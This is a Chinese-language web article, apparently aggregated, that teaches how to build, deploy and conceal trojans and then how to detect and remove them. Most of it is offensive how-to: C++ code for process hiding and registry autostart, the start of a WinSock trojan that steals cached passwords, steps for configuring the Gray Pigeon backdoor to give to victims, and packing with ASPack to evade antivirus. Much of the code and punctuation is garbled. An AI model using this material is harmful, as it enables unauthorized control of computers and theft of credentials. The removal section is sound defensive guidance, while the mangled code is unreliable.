手把手教你如何製作木馬？如何識別木馬？如何查殺 ... - 趣關注

病毒是當已感染的軟體執行時，這些惡性程式向計算機軟體新增程式碼，修改程式的工作方式，從而獲取計算機的控制權。

2、. 木馬是 ... 首頁> 遊戲> 手把手教你如何製作木馬？如何識別木馬？如何查殺木馬？手把手教你如何製作木馬？如何識別木馬？如何查殺木馬？由 安界 發表于 遊戲2019-01-25釋放器木馬用什麼查殺大家應該對"木馬"這個名詞都不陌生，很多人感覺自己的“電腦系統變慢了”，“某些檔案打不開了”，“開啟網頁慢了”就懷疑自己是不是中"病毒木馬"了，其實這裡要給大家解釋一下，"病毒"和"木馬"並不是一個統一概念，本質上還是有一些區別的，木馬雖然屬於病毒中的一類，但是要單獨的從病毒型別中間剝離出來。

獨立的稱之為"木馬"程式。

木馬和病毒的主要區別：1、病毒是當已感染的軟體執行時，這些惡性程式向計算機軟體新增程式碼，修改程式的工作方式，從而獲取計算機的控制權。

2、木馬是指未經使用者同意進行非授權操作的一種惡意程式。

它們可能刪除硬碟上的資料，使系統癱瘓，盜取使用者資料等。

木馬程式不能獨立侵入計算機，而是要依靠駭客來進行傳播，它們常常被偽裝成“正常”軟體進行散播。

3、他們最大的區別就是病毒具有感染性，而木馬一般不具有感染性，另外，病毒入侵後立刻有感覺，而木馬入侵後希望你沒有感覺，這樣才有利於她“開展工作”。

好的，大家理解了木馬和病毒的區別以後，今天咱們進入正題，闡述一下"木馬程式的原理與實現"！一、木馬程式簡介1、木馬的由來和定義由來：先講個故事，故事發生在在三千多年的古希臘，特洛伊的王子帕里斯愛上了斯巴達國王的妻子——絕世美女海倫。

王子把她帶回了特洛伊古城，這時斯巴達王非常的憤怒，他找到了自己的哥哥，邁錫尼國王阿加伽門農，請求他的的幫忙，阿伽門農正好也希望征服特洛伊，於是藉此機會建立了一支希臘聯軍討伐特洛伊古城。

然後事情卻沒那麼簡單，建軍圍攻了特洛伊古城9年仍未攻下，到了第十年，將領奧德修斯想出一計，將一批勇士藏於一批巨大的木馬腹內，放在城外，大部隊則佯裝退軍。

特洛伊人以為敵軍已退，就開啟城門，打掃戰場，並把敵軍留下的那隻木馬作為戰利品帶進了城中。

全程飲酒狂飲，到了夜間，全城軍民進入夢鄉，而埋伏在木馬中的勇士們跳了出來，並開啟城門四處放火，城外將士一擁而入，部隊裡應外合，攻下了特洛伊城池。

後代稱這隻大木馬為"特洛伊木馬"。

後來，人們在寫文章時，就常用"特洛伊木馬"這一典故比作在敵方營壘內埋下伏兵裡應外合的活動。

基礎定義：入侵者編寫入侵他人電腦並進行控制和破壞的程式，就叫做"木馬程式"。

木馬與計算機網路中常常要用到的遠端控制軟體有些相似，但由於遠端控制軟體是“善意”的控制，因此通常不具有隱蔽性；“木馬”則完全相反，木馬的目的是要達到"偷竊"性的遠端控制，如果沒有很強的隱蔽性的話，那就是“毫無價值”的。

2、木馬的主要特點（1）偽裝性：木馬總是偽裝成其他程式來迷惑管理員。

（2）潛伏性：木馬能夠毫無聲響地開啟埠等待外部連線。

（3）隱蔽性：木馬的執行隱蔽，甚至使用任務管理器都看不出來。

（4）自動執行性：當系統啟動時自動執行。

3、木馬被入侵者用來做什麼？（1）入侵當基於認證和漏洞的入侵無法進行時，就需要考慮使用木馬入侵。

（2）留後門由於木馬連線不需要系統認證並且隱蔽性好，為了以後還能控制遠端主機，可以種木馬以留後門。

二、木馬的工作原理1、基本原理木馬是一種基於遠端控制的駭客工具，一般來說，木馬程式包括客戶端和服務端兩部分。

其中，客戶端執行在入侵者的作業系統上，是入侵者控制目標主機的平臺；服務端則是執行在目標主機上，是被控制的平臺，一般傳送給目標主機的就是服務端檔案。

木馬主要是依靠郵件附件、軟體下載、淫穢圖片、通訊軟體等途徑進行傳播，然後，木馬透過一定的提示誘使目標主機執行木馬的服務端程式，實現木馬的種植。

例如：入侵者偽裝成目標主機使用者的朋友，傳送了一張捆綁有木馬的電子賀卡，當目標主機開啟賀卡後，螢幕上雖然會出現賀卡的畫面，但此時木馬服務端程式已經在後臺運行了。

木馬的體積都非常小，大部分在幾KB到幾十KB之間。

當目標主機執行了服務端程式之後，入侵者便可以透過客戶端程式與目標主機的服務端建立連線，進而控制目標主機。

對於通訊協議的選擇，絕大多數木馬使用的是TCP/IP協議，但也有使用UDP協議的木馬。

木馬的服務端程式會盡可能地隱蔽行蹤，同時監聽某個特定的埠，等待客戶端的連線；此外，服務端程式為了在每次重新啟動計算機後能正常執行，還需要透過修改登錄檔等方法實現自啟動功能。

2、關鍵技術（一）隱藏技術1）程式隱藏木馬程式可以利用程式捆綁的方式，將自己和正常的exe檔案進行捆綁。

當雙擊執行捆綁後的程式時，正常的exe檔案運行了。

程式隱藏只能達到從表面上無法識別木馬程式的目的，但是可以透過任務管理器中發現木馬程式的蹤跡，這就需要木馬程式實現程序隱藏。

2）程序隱藏隱藏木馬程式的程序顯示能防止使用者透過任務管理器檢視到木馬程式的程序，從而提高木馬程式的隱蔽性。

主要有兩種：API攔截屬於程序偽隱藏方式透過利用Hook技術監控並截獲系統中某些程式對程序顯示的API函式呼叫，然後修改函式返回的程序資訊，將自己從結果中刪除，導致任務管理器等工具無法顯示該木馬程序。

遠端執行緒注入屬於程序真隱藏方式主要是利用CreateRemoteThread函式在某一個目標程序中建立遠端執行緒，共享目標程序的地址空間，並獲得目標程序的相關許可權，從而修改目標程序內部資料和啟動DLL木馬。

3）通訊隱藏可以從通訊連線的狀況中發現木馬程式的蹤跡。

因此，很有必要實現木馬程式的通訊隱藏。

主要有兩種方式：埠複用技術，它讓木馬服務端程式共享其他網路程式已開啟的埠和客戶端進行連線，從而防止重新開啟埠降低隱蔽性。

關鍵之處在於，木馬程式應增設一個數據包轉交判斷模組，該模組控制主機對資料報的轉交選擇。

利用ICMP和HTTP協議，通常網路防火牆和入侵檢測系統等安全裝置只檢查ICMP報文的首部，對資料部分不做處理。

因此，可以將木馬程式的通訊資料隱藏在ICMP報文格式的選項資料欄位進行傳送，如把服務端程式向客戶端程式傳輸的資料偽裝成回顯請求報文，而把客戶端程式向服務端程式傳輸的資料偽裝成回顯應答報文。

這樣，就可以透過PING\PINGRESPONSE的方式在木馬服務端程式和客戶端程式之間建立起一個高效的秘密會話通道。

利用ICMP協議傳輸資料還有一個很大的優點，即ICMP屬於IP層協議，它在傳輸資料時並不使用任何埠，從而具有更好的隱蔽性。

（二）木馬自啟動技術自啟動功能是必不可少的。

自啟動可以保證木馬不會因為使用者的一次關機操作而徹底失去作用。

下面介紹經常使用的幾種方法。

1）在Win.ini中啟動在Win。

ini檔案中的［Windows］欄位中有啟動命令“load=”和“run=”。

預設情況下，“=”後面是空白的。

這兩項分別是用來當系統啟動時自動載入和執行的程式，如果木馬程式載入到這兩項中，那麼系統啟動後即可自動地載入和執行。

2）在System.ini中啟動在System。

ini檔案中的［boot］欄位的shell=Explorer。

exe中是木馬常用的隱藏載入的地方。

木馬最慣用的伎倆就是把本應是“Explorer。

exe”變成自己的程式名，名稱偽裝成幾乎與Explorer。

exe一樣，只需稍稍改“Explorer”的字母“l”改為數字“1”，或者把其中的“o”改為數字“0”，這些改變如果不仔細留意是很難被人發現的。

或者是shell=Explorer。

exe的後面加上木馬程式的路徑，如：shell=Explorer。

exesample。

exe，這裡的sample。

exe就是木馬服務端程式。

3）透過啟動組實現自啟動啟動組是專門用來實現應用程式自啟動的地方。

啟動組資料夾的位置為“C：\DocumentsandSettings\AllUsers\「開始」選單\程式\啟動”。

［注：“AllUsers”即對所有使用者都有作用］4）透過登錄檔啟動HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run，HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce，HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run，HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce5）修改檔案關聯修改檔案關聯是木馬常用手段。

例如：在正常情況下，txt檔案的開啟方式為notepad。

exe檔案，但一旦中了檔案關聯木馬，則txt檔案開啟方式就會被修改為用木馬程式開啟。

例如著名的國產木馬冰河就是這樣。

6）捆綁檔案入侵者可以透過一些駭客軟體，如著名的DeceptionBinder，完成檔案的捆綁，之後將這些捆綁檔案放到網站、FTP、BT等資源下載場所，當用戶下載並執行捆綁檔案，同時就啟動了木馬的服務端程式。

（三）木馬植入技術1）圖示偽裝駭客為了迷惑使用者，將木馬服務端程式的圖示換成一些常見的檔案型別的圖示。

2）檔案捆綁欺騙檔案捆綁就是透過使用檔案捆綁器將木馬服務端和正常的檔案捆綁在一起，達到欺騙對方從而執行捆綁的木馬程式的目的。

例如，把木馬服務端和某個遊戲，或者flash檔案捆綁成一個檔案透過QQ或郵件傳送給受害者。

當受害者對這個遊戲或flash感興趣而下載到機器上，並開打了該檔案，木馬程式就會悄悄執行。

3）定製埠很多老式的木馬埠都是固定的，只要查一下特定的埠就知道感染了什麼木馬。

現在很多新式的木馬都加入了定製埠的功能，控制端使用者可以在1024～65535之間任選一個埠作為木馬埠，一般不選1024以下的埠，這就給判斷所感染的木馬型別帶來了麻煩。

4）副檔名欺騙例如，影象檔案的副檔名不可能是。

exe，而木馬程式的副檔名又必定是。

exe，大多數使用者在看到副檔名為“。

exe”的檔案時，就會很小心。

於是設計者就將檔名進行一些改變，例如將“picture。

tiff”更改為“pitcture。

tiff。

exe”，因為windows預設是不顯示副檔名的，於是使用者就只能看到“picture。

tiff”，很容易將其作為一個圖片檔案而啟動。

三、木馬的演變與種類1、木馬的演變從木馬的發展來看，把木馬分為五代。

1）第一代木馬第一代的木馬功能相當簡單，典型的有backorifice（簡稱：BO）、netSpy等，早就退出了歷史的舞臺。

第一代windows木馬只是一個將自己偽裝成特殊的程式或檔案的軟體，如偽裝成一個使用者登入視窗，當用戶運行了木馬偽裝的登入視窗，輸入使用者名稱和密碼後，木馬將自動記錄資料並轉發給入侵者。

2）第二代木馬提供了幾乎所有能夠進行的遠端控制操作。

國內最具代表性的就是冰河木馬和廣外女生。

3）第三代木馬繼續完善了連線與檔案傳輸技術，並增加了木馬穿透防火牆的功能，並出現了“反彈埠”技術，如國內的灰鴿子木馬軟體。

4）第四代木馬利用了遠端執行緒插入技術，將木馬執行緒插入DLL執行緒中，使系統更加難以發現木馬的存在與入侵的連線方式。

5）第五代木馬相對於第四代木馬，功能更加全面。

而且應用DLL技術後在目標主機的計算機中不生成新的檔案。

2、木馬的種類1）破壞型破壞並刪除檔案，自動刪除電腦上的dll、EXE等檔案，以達到使被感染的電腦癱瘓的目的。

2）密碼傳送型密碼傳送型的木馬正是專門為了盜取被感染計算機上的密碼而編寫的，該木馬一旦被執行，就會自動搜尋記憶體，Cache，臨時資料夾以及各種敏感密碼檔案，一旦搜尋到有用的密碼，木馬就會利用免費的電子郵件服務將密碼傳送到指定的郵箱。

從而達到獲取密碼的目的，所以這類木馬大多使用25號埠傳送E-mail。

3）遠端訪問型遠端訪問型木馬程式一般包括客戶端程式和服務端程式，在目標主機上執行了服務端程式之後，只要使用者知道目標主機的IP地址或主機名，就可以與目標主機連線，連線成功後，使用者透過客戶端程式提供的遠端操作功能就可以實現對目標主機的監視與控制。

大名鼎鼎的木馬冰河就是一個遠端訪問型特洛伊木馬。

4）鍵盤記錄木馬記錄目標主機使用者的鍵盤操作且將鍵盤操作記錄在檔案中，入侵者可以獲取這些檔案並在檔案中獲取諸如密碼等有用的資訊。

對於這種型別的木馬，郵件傳送功能也是必不可少的。

5）Dos攻擊木馬Dos全名是Denialofservice（拒絕服務）。

它故意攻擊網路協議的缺陷或直接透過某種手段耗盡被攻擊物件的資源，目的是讓目標計算機或網路無法提供正常的服務或資源訪問，使目標系統服務停止響應甚至崩潰。

當駭客侵入一臺計算機並種上了DOS攻擊木馬後，日後這臺計算機就成了駭客DOS攻擊的最得力的幫手。

駭客控制的計算機數量越多，發動DOS攻擊取得成功的機率就越大，所以，這種木馬的危害不是體現在被感染的計算機上，而是體現在攻擊者可以利用它來攻擊網路上的其他的計算機。

全名是（），很多攻擊源一起攻擊某臺伺服器就組成了DDOS攻擊。

6）代理木馬給被控制的肉雞種上代理木馬，讓其變成入侵者發動攻擊的跳板就是代理木馬最重要的任務。

透過代理木馬，入侵者可以在匿名的情況下使用Telnet等程式，從而隱蔽自己的蹤跡。

7）FTP木馬這種木馬可能是最簡單和古老的木馬了，它的惟一功能就是開啟21埠，等待使用者連線。

現在新FTP木馬還加上了密碼功能，這樣，只有攻擊者本人才知道正確的密碼，從而進入對方的計算機。

8）程式殺手木馬常見的查殺木馬軟體有瑞星，NortonAnti-Virus及木馬清除大師等。

程式殺手木馬的功能就是關閉目標機器上執行的木馬查殺程式，讓木馬更好地發揮作用。

9）反彈埠型木馬木馬開發者在分析了防火牆的特性後發現：防火牆對於連入的連結往往會進行非常嚴格的過濾，但是對於連出的連結卻疏於防範。

於是，與一般的木馬相反，反彈埠型木馬在服務端（被控制端）使用主動埠，客戶端（控制端）使用被動埠。

木馬定時監測客戶端（控制端）的存在，發現客戶端（控制端）上線立即主動連線控制端開啟的主動埠；為了隱蔽起見，客戶端（控制端）的被動埠一般設定為80（瀏覽網頁必須開的埠），這樣，即使使用者使用埠掃描軟體檢查自己的埠，發現的也是類似TCPUserIP：1026ControllerIP：80ESTABLISHED的情況，不明真相的使用者就會以為自己在瀏覽網頁，並且，防火牆一般不會禁止使用者向外連線80埠。

主流木馬：四、木馬程式的實現1、木馬中的關鍵技術實現（附原始碼）1)木馬程式隱藏技術透過註冊服務程式，實現程序偽隱藏的方法：WINAPIWinMain（HINSTANCE，HINSTANCE，LPSTR，int）{try{DWORDdwVersion=GetVersion（）；//取得Windows的版本號if（dwVersion>=0x80000000）//Windows9x隱藏任務列表{int（CALLBACK*rsp）（DWORD，DWORD）；HINSTANCEdll=LoadLibrary（“KERNEL32。

DLL”）；//裝入KERNEL32。

DLLrsp=（int（CALLBACK*）（DWORD，DWORD））GetProcAddress（dll，“RegisterServiceProcess”）；//找到RegisterServiceProcess的入口rsp（NULL，1）；//註冊服務FreeLibrary（dll）；//釋放DLL模組}}catch（Exception&exception）//處理異常事件{//處理異常事件}return0；}2)程式的自啟動執行技術展示一段透過修改HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersions/Run鍵值來實現自啟動的程式：HKEYhkey；AnsiStringNewProgramName=AnsiString（sys）+AnsiString（“+PName/”>//“）+PNameunsignedlongk；k=REG_OPENED_EXISTING_KEY；RegCreateKeyEx（HKEY_LOCAL_MACHINE，”SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN//“，0L，NULL，REG_OPTION_NON_VOLATILE，KEY_ALL_ACCESS|KEY_SET_VALUE，NULL，&hkey，&k）；RegSetValueEx（hkey，”BackGroup“，0，REG_SZ，NewProgramName。

c_str（），NewProgramName。

Length（））；RegCloseKey（hkey）；if（int（ShellExecute（Handle，”open“，NewProgramName。

c_str（），NULL，NULL，SW_HIDE））>32）{WantClose=true；Close（）；}else{HKEYhkey；unsignedlongk；k=REG_OPENED_EXISTING_KEY；longa=RegCreateKeyEx（HKEY_LOCAL_MACHINE，”SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN“，0，NULL，REG_OPTION_NON_VOLATILE，KEY_SET_VALUE，NULL，&hkey，&k）；RegSetValueEx（hkey，”BackGroup“，0，REG_SZ，ProgramName。

c_str（），ProgramName。

Length（））；intnum=0；charstr［20］；DWORDlth=20；DWORDtype；charstrv［255］；DWORDvl=254；DWORDSuc；do{Suc=RegEnumValue（HKEY_LOCAL_MACHINE，（DWORD）num，str，NULL，&type，strv，&vl）；if（strcmp（str，”BGroup“）==0）{DeleteFile（AnsiString（strv））；RegDeleteValue（HKEY_LOCAL_MACHINE，”BGroup“）；break；}}while（Suc==ERROR_SUCCESS）；RegCloseKey（hkey）；}2、WINSOCK程式設計完成一個簡單"木馬程式"實現（附原始碼）用非同步SOCKET方式，直接呼叫WINSOCKAPI，WINSDK寫的木馬（VC，C++BUILDER下均編譯，除錯透過），無須客戶端，編譯後才幾十K。

實現了些主要功能，檔案瀏覽，上傳，下載（均支援統配符），改變目錄，獲取系統資訊，從CACHE取密碼，執行檔案，顯示程序，傳送訊息，關機，還有些控制功能。

原始碼如下：#include#include#include#pragmahdrstop#include#pragmaargsused#defineRUN”//WinMon32。

exe“//註冊服務#defineSERVICE_PROC1//解除安裝服務#defineUNSERVICE_PROC0#defineTH32CS_SNAPPROCESS0x00000002#definePROCESS_HANDLE_NAME255//緩衝區長度#definedwBuffSize2048//命令列長度#definedwComm50#definePORT9102#defineWM_SOCKETWM_USER+1#definePROMPT”LanLan：//>“DWORDdwVersion=MAKEWORD（1，1）；DWORDdwFlag=TRUE；WSADATAwsaData；SOCKETCreateSock，NewSock；SOCKADDR_INSock_in，NewSock_in；LPTSTRszReadBuff，Ob，TempBuff；intaddrlen；//CACHEPASSWORD結構typedefstructtagPASSWORD_CACHE_ENTRY{WORDcbEntry；WORDcbResource；WORDcbPassword；BYTEiEntry；BYTEnType；charabResource［1］；}PASSWORD_CACHE_ENTRY；typedefBOOL（WINAPI*CACHECALLBACK）（PASSWORD_CACHE_ENTRY*pce，DWORD）；//CACHEPASSWORD函式原形typedefWORD（WINAPI*PWNetEnumCachedPasswords）（LPSTRpbPrefix，DWORDcbPrefix，DWORDnType，CACHECALLBACKpfnCallback，DWORDUNKNOWN）；//TOOLHELP32結構typedefstructtagPROCESSENTRY32{DWORDdwSize；DWORDcntUsage；DWORDth32ProcessID；DWORDth32DefaultHeapID；DWORDth32ModuleID；DWORDcntThreads；DWORDth32ParentProcessID；LONGpcPriClassBase；DWORDdwFlags；TCHARszExeFile［MAX_PATH］；}PROCESSENTRY32；typedefPROCESSENTRY32*LPPROCESSENTRY32；注：由於文章篇幅限制剩餘原始碼可以私信我單獨傳送3、利用"灰鴿子"工具軟體製作木馬灰鴿子簡介：灰鴿子是國內一款著名後門。

比起前輩冰河、黑洞來，灰鴿子可以說是國內後門的集大成者。

其豐富而強大的功能、靈活多變的操作、良好的隱藏性使其他後門都相形見絀。

客戶端簡易便捷的操作使剛入門的初學者都能充當駭客。

當使用在合法情況下時，灰鴿子是一款優秀的遠端控制軟體。

但如果拿它做一些非法的事，灰鴿子就成了很強大的駭客工具。

方法如下：首先，在電腦上安裝灰鴿子，然後進入其主頁面接下來我們點自動上線FTP伺服器就是你FTP空間的地址下來點配置服務程式，先點自動上線設定，IP通知那裡添上你FTP在HTTP的訪問地址加上你放IP檔案的地址最終我們要把伺服器配置成功這時你只要將自己生成的木馬給別人執行就可以了，這樣他就會上線如下圖如果設了密碼就要輸入連線密碼哦五、如何給易被查殺的木馬"加殼"大家知道現在的病毒查殺軟體對已知的木馬程式很容易就查殺掉，所以當你好不容易製作的木馬傳播出去後，輕鬆就被客戶端查殺掉了，這時我們就要利用加殼技術，給木馬套個"殼"防止被殺1、什麼是加殼？加殼：是一種透過一系列數學運算，將可執行程式檔案（EXE）或動態連結庫檔案（DLL）的編碼進行改變（目前加殼軟體還可以壓縮、加密），以達到縮小檔案體積或加密程式編碼的目的。

當被加殼的程式執行時，外殼程式先被執行，然後由這個外殼程式負責將使用者原有的程式在記憶體中解壓縮，並把控制權交還給脫殼後的真正程式。

常見到的壓縮殼有"UPX"、"北斗程式壓縮"、"ASPack"等，加密殼有"PE-Armor"、"ASProtect"等等。

2、利用ASPack加殼防止木馬被查殺：步驟1：下載並執行ASPack2。

28軟體，即可開啟ASPack2。

28主視窗，如圖1-69所示。

在”選項“選項卡中勾選”壓縮資源“、”載入後立即執行“及”使用WindowsDLL載入器“等複選項，如下圖所示：步驟2：選擇”開啟檔案“選項卡，單擊”開啟“按鈕，即可開啟”選擇要壓縮的檔案“對話方塊，在其中選擇需要加殼的檔案，如下圖所示。

步驟3：單擊”開啟“按鈕，即可開始進行壓縮，如下圖所示。

在”壓縮“選項卡中可進行壓縮、測試操作，並在完成之後生成加殼後的檔案。

使用方法比較簡單，可以自行測試一下效果！六、如何識別與查殺木馬程式識別方法：1、檢查網路連線情況由於不少木馬會主動偵聽埠，或者會連線特定的IP和埠，所以我們可以在沒有正常程式連線網路的情況下，透過檢查網路連情情況來發現木馬的存在。

具體的步驟是點選”開始“”執行“”cmd“，然後輸入netstat-an這個命令能看到所有和自己電腦建立連線的IP以及自己電腦偵聽的埠，它包含四個部分——proto（連線方式）、localaddress（本地連線地址）、foreignaddress（和本地建立連線的地址）、state（當前埠狀態）。

透過這個命令的詳細資訊，我們就可以完全監控電腦的網路連線情況。

　2、檢視目前執行的服務服務是很多木馬用來保持自己在系統中永遠能處於執行狀態的方法之一。

我們可以透過點選”開始“”執行“”cmd“，然後輸入”netstart“來檢視系統中究竟有什麼服務在開啟，如果發現了不是自己開放的服務，我們可以進入"服務"管理工具中的"服務"，找到相應的服務，停止並禁用它。

　3、檢查系統啟動項由於登錄檔對於普通使用者來說比較複雜，木馬常常喜歡隱藏在這裡。

檢查登錄檔啟動項的方法如下：點選”開始“”執行“”regedit“，然後檢查HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下所有以”run“開頭的鍵值；HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion下所有以”run“開頭的鍵值；HKEY-USERS\。

Default\Software\Microsoft\Windows\CurrentVersion下所有以”run“開頭的鍵值。

Windows安裝目錄下的System。

ini也是木馬喜歡隱蔽的地方。

開啟這個檔案看看，在該檔案的［boot］欄位中，是不是有shell=Explorer.exefile.exe這樣的內容，如有這樣的內容，那這裡的file.exe就是木馬程式了！　4、檢查系統帳戶惡意的攻擊者喜在電腦中留有一個賬戶的方法來控制你的計算機。

他們採用的方法就是啟用一個系統中的預設賬戶，但這個賬戶卻很少用的，然後把這個賬戶的許可權提升為管理員許可權，這個帳戶將是系統中最大的安全隱患。

惡意的攻擊者可以透過這個賬戶任意地控制你的計算機。

針對這種情況，可以用以下方法對賬戶進行檢測。

點選”開始“；”執行“”cmd“，然後在命令列下輸入netuser，檢視計算機上有些什麼使用者，然後再使用”netuser使用者名稱“檢視這個使用者是屬於什麼許可權的，一般除了Administrator是administrators組的，其他都不應該屬於administrators組，如果你發現一個系統內建的使用者是屬於administrators組的，那幾乎可以肯定你被入侵了。

快使用"netuser使用者名稱/del"來刪掉這個使用者吧！5、利用系統程序識別木馬任何病毒和木馬存在於系統中，都無法徹底和程序脫離關係，即使採用了隱藏技術，也還是能夠從程序中找到蛛絲馬跡，因此，檢視系統中活動的程序成為我們檢測病毒木馬最直接的方法。

木馬常利用的系統程序有：svchost.exe、explorer.exe、iexplore.exe、winLOGOn.exe等程序。

（1）svchost.exe常被病毒冒充的程序名有：svch0st。

exe、schvost。

exe、scvhost。

exe。

隨著Windows系統服務不斷增多，為了節省系統資源，微軟把很多服務做成共享方式，交由svchost。

exe程序來啟動。

而系統服務是以動態連結庫（DLL）形式實現的，它們把可執行程式指向scvhost，由cvhost呼叫相應服務的動態連結庫來啟動服務。

我們可以開啟”控制面板“→”治理工具“→服務，雙擊其中”ClipBook“服務，在其屬性面板中可以發現對應的可執行檔案路徑為”C：\WINDOWS\system32\clipsrv。

exe“。

再雙擊”Alerter“服務，可以發現其可執行檔案路徑為”C：\WINDOWS\system32\svchost。

exe-kLocalService“，而”Server“服務的可執行檔案路徑為”C：\WINDOWS\system32\svchost。

exe-knetsvcs“。

正是透過這種呼叫，可以省下不少系統資源，因此係統中出現多個svchost。

exe，其實只是系統的服務而已。

在Windows系統中一般存在2個svchost。

exe程序，一個是RPCSS（RemoteProcedureCall）服務程序，另外一個則是由很多服務共享的一個svchost。

exe；而在WindowsXP中，則一般有4個以上的svchost。

exe服務程序。

假如svchost.exe程序的數量多於5個，就要小心了，很可能是病毒假冒的，檢測方法也很簡單，使用一些程序治理工具，例如Windows最佳化大師的程序治理功能，檢視svchost.exe的可執行檔案路徑，假如在"C:\WINDOWS\system32"目錄外，那麼就可以判定是病毒了。

（2）explorer.exe常被病毒冒充的程序名有：iexplorer。

exe、expiorer。

exe、explore。

exe。

explorer。

exe就是我們經常會用到的”資源治理器“。

假如在”任務治理器“中將explorer。

exe程序結束，那麼包括工作列、桌面、以及開啟的檔案都會統統消失，單擊”任務治理器“→”檔案“→”新建任務“，輸入”explorer。

exe“後，消失的東西又重新回來了。

explorer。

exe程序的作用就是讓我們治理計算機中的資源。

explorer.exe程序預設是和系統一起啟動的，其對應可執行檔案的路徑為"C:\Windows"目錄，除此之外則為病毒。

（3）iexplore.exe常被病毒冒充的程序名有：iexplorer。

exe、iexploer。

exeiexplorer。

exe程序和上文中的explorer。

exe程序名很相像，因此比較輕易搞混，其實iexplorer。

exe是MicrosoftInternetExplorer所產生的程序，也就是我們平時使用的IE瀏覽器。

知道作用後辨認起來應該就比較輕易了，iexplorer。

exe程序名的開頭為”ie“，就是IE瀏覽器的意思。

iexplore。

exe程序對應的可執行程式位於C：\ProgramFiles\InternetExplorer目錄中，存在於其他目錄則為病毒，除非你將該資料夾進行了轉移。

此外，有時我們會發現沒有開啟IE瀏覽器的情況下，系統中仍然存在iexplore。

exe程序，這要分兩種情況：1）病毒假冒iexplore.exe程序名。

2）病毒偷偷在後臺透過iexplore.exe幹壞事。

（4）rundll32.exe常被病毒冒充的程序名有：rundl132。

exe、rundl32。

exe。

rundll32。

exe在系統中的作用是執行DLL檔案中的內部函式，系統中存在多少個Rundll32。

exe程序，就表示Rundll32。

exe啟動了多少個的DLL檔案。

其實rundll32。

exe我們是會經常用到的，他可以控制系統中的一些dll檔案，舉個例子，在”命令提示符“中輸入”rundll32。

exeuser32。

dll，LockWorkStation“，回車後，系統就會快速切換到登入介面了。

rundll32.exe的路徑為"C:\Windows\system32"，在別的目錄則可以判定是病毒。

（5）spoolsv.exe常被病毒冒充的程序名有：spoo1sv。

exe、spolsv。

exe。

spoolsv。

exe是系統服務”PrintSpooler“所對應的可執行程式，其作用是治理所有本地和網路列印佇列及控制所有列印工作。

假如此服務被停用，計算機上的列印將不可用，同時spoolsv。

exe程序也會從計算機上消失。

假如你不存在印表機裝置，那麼就把這項服務關閉吧，可以節省系統資源。

停止並關閉服務後，假如系統中還存在spoolsv.exe程序，這就一定是病毒偽裝的了。

查殺方法：手工查殺：1、執行任務管理器，殺掉木馬程序。

2、檢查登錄檔中RUN、RUNSERVEICE等幾項，先備份，記下可以啟動項的地址，再將可疑的刪除。

3、刪除上述可疑鍵在硬碟中的執行檔案。

4、一般這種檔案都在WINNT，SYSTEM，SYSTEM32這樣的資料夾下，他們一般不會單獨存在，很可能是有某個母檔案複製過來的，檢查C、D、E等盤下有沒有可疑的。

exe，。

com或。

bat檔案，有則刪除之。

5、檢查登錄檔HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\SOFTWARE\Microsoft\InternetExplorer\Main中的幾項（如LocalPage），如果被修改了，改回來就可以。

6、檢查HKEY_CLASSES_ROOT\txtfile\shell\open\command和HKEY_CLASSES_ROOTxtfileshellopencommand等等幾個常用檔案型別的預設開啟程式是否被更改。

這個一定要改回來。

很多病毒就是透過修改。

txt檔案的預設開啟程式讓病毒在使用者開啟文字檔案時載入的。

利用工具查殺：查殺木馬好用的工具有LockDown、TheClean、木馬克星、金山木馬專殺、木馬清除大師、木馬分析專家等，利用這些工具絕大多數的已知木馬都可以查殺掉。

TAG:木馬exe木馬程式檔案程序上一篇：<>相關文章華為手機和電腦怎樣快速互傳檔案？開啟這個開關，高畫質無損任意傳每個系統管理員都要知道的30個Linux系統監控工具推薦：最近看的四部好看經典的電影在家辦公效率低？從電腦系統最佳化方法中，提取效率提高的實用步驟搜索推薦文章保育園女老師親吻孩子致其臉部有牙印和淤青，園方迴應：是實習生大猩猩吃菜不吃肉渾身是肌肉，蛋白質從哪來？科學家：你不行本事沒得說，才華橫溢的星座，這些人不依靠任何人，凡事講究自律諸葛亮作為才人，他的選人之道又是什麼標準呢？關於付出，你會犯怎樣的致命錯誤，四張圖片幫你測試，超準！顶部